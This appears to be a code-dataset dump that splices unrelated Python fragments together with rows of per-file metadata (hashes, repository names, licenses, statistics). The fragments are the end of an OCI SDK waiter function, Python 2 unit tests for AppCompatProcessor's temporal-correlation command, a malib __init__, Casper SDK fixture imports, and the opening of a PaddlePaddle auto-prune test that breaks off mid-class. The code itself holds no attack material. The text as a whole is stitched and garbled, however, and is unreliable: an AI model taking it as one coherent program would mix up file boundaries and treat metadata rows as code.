            evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
            **waiter_kwargs
        )
        return waiter_result
    except Exception as e:
        # Surface the partial result so callers can inspect what did complete.
        raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| 53.910217
| 245
| 0.69942
| 2,196
| 17,413
| 5.307832
| 0.102459
| 0.037234
| 0.046843
| 0.014413
| 0.886496
| 0.873198
| 0.86582
| 0.843686
| 0.824811
| 0.811857
| 0
| 0.002005
| 0.22667
| 17,413
| 322
| 246
| 54.07764
| 0.863582
| 0.481652
| 0
| 0.776978
| 0
| 0
| 0.026342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0
| 0.014388
| 0
| 0.194245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a59aae8993ab71b5ab8744a3242e701e137415b
| 21,678
|
py
|
Python
|
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | null | null | null |
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | null | null | null |
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | 1
|
2019-11-20T10:57:23.000Z
|
2019-11-20T10:57:23.000Z
|
from __future__ import absolute_import
import logging
from unittest import TestCase
import settings
import sys, traceback
reload(sys)
sys.setdefaultencoding("utf-8")
import os
from AppCompatProcessor import main
from shutil import copyfile
from ShimCacheParser import read_mir, write_it
import tempfile
import appDB
import re, codecs
from test.auxTest import build_fake_DB, add_entry
# Setup the logger
logger = logging.getLogger()
DB = None
def create_ShimCacheTxtFile(fileFullPath):
try:
with file(fileFullPath, 'rb') as xml_data:
(error, entries) = read_mir(xml_data, True)
if not entries:
if error == "":
print "[ShimCacheParser] found no entries for %s" % fileFullPath
settings.logger.error("[ShimCacheParser] found no entries for %s" % fileFullPath)
else:
print "[ShimCacheParser] Error on file %s - [error]" % (fileFullPath, error)
settings.logger.error("[ShimCacheParser] Error on file %s - [error]" % (fileFullPath, error))
return False
else:
write_it(entries, fileFullPath + "-shimcache.txt")
fileFullPath += "-shimcache.txt"
except IOError, err:
print "[ShimCacheParser] Error opening binary file: %s" % str(err)
settings.logger.error("[ShimCacheParser] Error opening binary file: %s" % str(err))
class TestAppTcorr(TestCase):
testset1 = ''
@classmethod
def setup_class(self):
# Build test dataset
self.testset1 = build_fake_DB(1)
@classmethod
def teardown_class(self):
# Remove temp dbs
os.remove(self.testset1)
def BuildTestPath(self, folder):
master_test_folder = os.path.join(
os.path.abspath(os.path.join(os.path.join(os.path.dirname(__file__), os.pardir), os.pardir)),
"appcompatprocessor-DataSets")
load_test_path = os.path.join(master_test_folder, folder)
return load_test_path
def count_lines_regex(self, input_filename, regex_string):
regex = re.compile(regex_string, re.IGNORECASE)
count = 0
with codecs.open(input_filename, 'r', 'UTF8') as inputFile:
content = inputFile.readlines()
for line in content:
if regex.search(line) is not None:
count += 1
return count
def test_TcorrTest_prog1(self):
with appDB.DBClass(self.testset1, settings.__version__) as DB:
DB.appInitDB()
conn = DB.appConnectDB()
# TestHost01
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1,ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
# TestHost02
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 1"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 2"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][3], "BBB.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][3], "FFF.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][10], 2, "test_TcorrTest_prog1 - Name failed!")
# Check Weight
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] == directCorrelationData[1][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[2][8] == directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 3"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][3], "BBB.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][3], "FFF.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][3], "AAA.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][3], "GGG.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][10], 2, "test_TcorrTest_prog1 - Name failed!")
# Check Weight
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[4][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[4][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] == directCorrelationData[1][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[2][8] == directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[4][8] == directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
# TestHost03
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 1"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 3, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 3, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 3, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 3, "test_TcorrTest_prog1 - Name failed!")
def _test_TcorrMixed(self):
# Verify that AmCache data doesn't get mixed in with AppCompat in the tcorr module
# Note that we currently print results separately but return a unique structure with aggregates both datasets
load_test_path = self.BuildTestPath("TestData-mini")
# Get temp db name for the test
tempdb = tempfile.NamedTemporaryFile(suffix='.db', prefix='testCase', dir=tempfile.gettempdir())
tempdb.close()
(db_filenameFullPath, db_version, num_hosts, num_instances, num_entries) = main([tempdb.name, "load", load_test_path])
directCorrelationData1 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Check Name
self.assertEquals(directCorrelationData1[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData1[0][6], 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData1[0][7], 158, "test_TcorrTest1 - After failed!")
load_test_path = self.BuildTestPath("TestData-AmCache")
(db_filenameFullPath2, db_version2, num_hosts2, num_instances2, num_entries2) = main([tempdb.name, "load", load_test_path])
directCorrelationData2 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Remove temp db
os.remove(tempdb.name)
# Check Name
self.assertEquals(directCorrelationData2[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData2[0][6], 0 + 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData2[0][7], 158 + 21, "test_TcorrTest1 - After failed!")
def _test_TcorrAmCache(self):
load_test_path = self.BuildTestPath("TestData-AmCache")
# Get temp db name for the test
tempdb = tempfile.NamedTemporaryFile(suffix='.db', prefix='testCase', dir=tempfile.gettempdir())
tempdb.close()
(db_filenameFullPath1, db_version1, num_hosts1, num_instances1, num_entries2) = main([tempdb.name, "load", load_test_path])
directCorrelationData1 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Remove temp db
os.remove(tempdb.name)
# Check Name
self.assertEquals(directCorrelationData1[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData1[0][6], 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData1[0][7], 21, "test_TcorrTest1 - After failed!")
| 65.690909
| 131
| 0.633822
| 2,244
| 21,678
| 5.937611
| 0.097148
| 0.067547
| 0.118883
| 0.143651
| 0.866256
| 0.856199
| 0.853347
| 0.837811
| 0.823852
| 0.803738
| 0
| 0.031026
| 0.246194
| 21,678
| 329
| 132
| 65.890578
| 0.784346
| 0.035658
| 0
| 0.651163
| 0
| 0
| 0.221466
| 0.001294
| 0
| 0
| 0
| 0
| 0.372093
| 0
| null | null | 0
| 0.050388
| null | null | 0.027132
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6272489566b31903ad9f84c8fe7a8026019409
| 196
|
py
|
Python
|
malib/agents/__init__.py
|
wwxFromTju/malib
|
7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2
|
[
"MIT"
] | 6
|
2021-05-19T10:25:36.000Z
|
2021-12-27T03:30:33.000Z
|
malib/agents/__init__.py
|
wwxFromTju/malib
|
7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2
|
[
"MIT"
] | 1
|
2021-05-29T04:51:37.000Z
|
2021-05-30T06:18:10.000Z
|
malib/agents/__init__.py
|
ying-wen/malib_deprecated
|
875338b81c4d87064ad31201f461ef742db05f25
|
[
"MIT"
] | 1
|
2021-05-31T16:16:12.000Z
|
2021-05-31T16:16:12.000Z
|
from malib.agents.ddpg.maddpg import MADDPGAgent
from malib.agents.ddpg.ddpg import DDPGAgent
from malib.agents.ddpg.ddpg_tom import DDPGToMAgent
from malib.agents.ddpg.ddpg_om import DDPGOMAgent
| 39.2
| 51
| 0.857143
| 30
| 196
| 5.533333
| 0.4
| 0.216867
| 0.361446
| 0.457831
| 0.415663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 196
| 4
| 52
| 49
| 0.922222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a71222f316c2de57569c472d262b7bb3e6e983d
| 1,986
|
py
|
Python
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 11
|
2021-09-27T08:41:18.000Z
|
2022-03-24T11:25:20.000Z
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 13
|
2021-09-13T19:08:45.000Z
|
2022-02-08T10:01:12.000Z
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 14
|
2021-07-12T10:46:33.000Z
|
2022-03-01T08:25:07.000Z
|
from tests.fixtures.accounts import account_key
from tests.fixtures.accounts import account_hash
from tests.fixtures.accounts import a_test_account
from tests.fixtures.accounts import create_account
from tests.fixtures.accounts import cp1
from tests.fixtures.accounts import cp2
from tests.fixtures.accounts import test_account_1
from tests.fixtures.chain import account_main_purse_uref
from tests.fixtures.chain import block
from tests.fixtures.chain import block_hash
from tests.fixtures.chain import state_root_hash
from tests.fixtures.chain import switch_block
from tests.fixtures.chain import switch_block_hash
from tests.fixtures.contracts import path_to_wasm_auction_bid
from tests.fixtures.contracts import path_to_wasm_auction_bid_withdrawal
from tests.fixtures.contracts import path_to_wasm_delegate
from tests.fixtures.contracts import path_to_wasm_delegate_withdrawal
from tests.fixtures.deploys import a_test_chain_id
from tests.fixtures.deploys import a_test_timestamp
from tests.fixtures.deploys import a_test_ttl_humanized
from tests.fixtures.deploys import a_test_uref
from tests.fixtures.deploys import deploy_params
from tests.fixtures.deploys import deploy_params_static
from tests.fixtures.deploys import a_deploy
from tests.fixtures.iterator_deploy_entities import yield_entities as deploy_entities_iterator
from tests.fixtures.node import CLIENT
from tests.fixtures.node import NODE_HOST
from tests.fixtures.node import NODE_PORT_REST
from tests.fixtures.node import NODE_PORT_RPC
from tests.fixtures.node import NODE_PORT_SSE
from tests.fixtures.vectors import cl_types as cl_types_vector
from tests.fixtures.vectors import cl_values as cl_values_vector
from tests.fixtures.vectors import crypto_checksums
from tests.fixtures.vectors import crypto_hashes
from tests.fixtures.vectors import crypto_key_pairs
from tests.fixtures.vectors import crypto_key_pair_specs
from tests.fixtures.vectors import crypto_signatures
from tests.fixtures.vectors import deploys_1
| 50.923077
| 94
| 0.882175
| 307
| 1,986
| 5.469055
| 0.198697
| 0.203693
| 0.384753
| 0.114354
| 0.816557
| 0.70816
| 0.410363
| 0.121501
| 0.121501
| 0.061942
| 0
| 0.002188
| 0.079557
| 1,986
| 38
| 95
| 52.263158
| 0.916302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6ab4a72e8368f57446e9d99b840ad51c2c6ccb33
| 16,992
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle.fluid as fluid
import numpy as np
class AutoPruneLayer0(fluid.Layer):
    """Two constant-initialized FC branches whose product is reduced to a
    scalar loss; both branches carry gradients, so auto-prune must keep
    every parameter."""

    def __init__(self, name_scope):
        super(AutoPruneLayer0, self).__init__(name_scope)
        self.fc1 = fluid.dygraph.FC(
            "FC_1", 5,
            param_attr=fluid.initializer.ConstantInitializer(value=2),
            bias_attr=False)
        self.fc2 = fluid.dygraph.FC(
            "FC_2", 5,
            param_attr=fluid.initializer.ConstantInitializer(value=2),
            bias_attr=False)

    def forward(self, x, y):
        left = self.fc1(x)
        right = self.fc2(y)
        product = fluid.layers.mul(left, right)
        return fluid.layers.reduce_mean(product)
class AutoPruneLayer1(fluid.Layer):
    """Same topology as AutoPruneLayer0, but the second branch's output is
    detached via stop_gradient, so fc2's weight must receive no gradient."""

    def __init__(self, name_scope):
        super(AutoPruneLayer1, self).__init__(name_scope)
        self.fc1 = fluid.dygraph.FC(
            "FC_1", 5,
            param_attr=fluid.initializer.ConstantInitializer(value=2),
            bias_attr=False)
        self.fc2 = fluid.dygraph.FC(
            "FC_2", 5,
            param_attr=fluid.initializer.ConstantInitializer(value=2),
            bias_attr=False)

    def forward(self, x, y):
        left = self.fc1(x)
        detached = self.fc2(y)
        # Cut the graph here: no gradient should flow into fc2.
        detached.stop_gradient = True
        product = fluid.layers.mul(left, detached)
        return fluid.layers.reduce_mean(product)
class AutoPruneLayer2(fluid.Layer):
    """Feeds the label through an FC layer and two casts before
    cross-entropy; the label path carries no gradient, so fc2 should be
    pruned."""

    def __init__(self, name_scope):
        super(AutoPruneLayer2, self).__init__(name_scope)
        self.fc = fluid.dygraph.FC("FC1", size=10, act=None)
        self.fc2 = fluid.dygraph.FC("FC2", size=1, act=None)

    def forward(self, x, label):
        feature = self.fc(x)
        label = self.fc2(label)
        # Round-trip cast float32 -> int64 to produce an integer label.
        label = fluid.layers.cast(label, dtype="float32")
        label = fluid.layers.cast(label, dtype='int64')
        # Note that the label is not persistable in fluid.layers.cross_entropy.
        loss = fluid.layers.cross_entropy(input=feature, label=label)
        return fluid.layers.mean(loss)
class AutoPruneLayer3(fluid.Layer):
    """Splits a 20-wide FC output in half and builds the loss from the
    first half only; the unused half should end up with zero gradient."""

    def __init__(self, name_scope):
        super(AutoPruneLayer3, self).__init__(name_scope)
        self.fc = fluid.dygraph.FC("FC1", size=20, act=None)

    def forward(self, x, label, test_num):
        feature = self.fc(x)
        part1, part2 = fluid.layers.split(
            feature, num_or_sections=[10, 10], dim=1)
        # part2 deliberately stays out of the loss.
        loss = fluid.layers.mean(
            fluid.layers.cross_entropy(input=part1, label=label))
        if test_num == 1:
            return loss, part2
        return loss, part1, part2
class MyLayer(fluid.Layer):
    """Holds two embeddings and two FC layers. forward() touches only the
    FC layers, so both embeddings should be prunable; the helper methods
    exercise narrower parameter subsets."""

    def __init__(self, name_scope, vocab_size, size, dtype="float32"):
        super(MyLayer, self).__init__(name_scope, dtype)
        self.embed0 = fluid.Embedding(size=(vocab_size, size))
        self.embed1 = fluid.Embedding(size=(vocab_size, size))
        self.fc0 = fluid.FC(self.full_name(), size=size, dtype=dtype)
        self.fc1 = fluid.FC(self.full_name(), size=size, dtype=dtype)

    def forward(self, x):
        # Only the fc layers participate in this path.
        combined = self.fc0(x) + self.fc1(x)
        return fluid.layers.reduce_mean(combined)

    def linear0(self, x):
        # Uses fc0 only.
        return fluid.layers.reduce_mean(self.fc0(x))

    def embed_linear0(self, x):
        # Uses embed0 and fc0 only.
        return fluid.layers.reduce_mean(self.fc0(self.embed0(x)))
class MyLayer2(fluid.Layer):
    """Variant of MyLayer whose forward() involves every parameter
    (both embeddings and both FC layers)."""

    def __init__(self, name_scope, vocab_size, size, dtype="float32"):
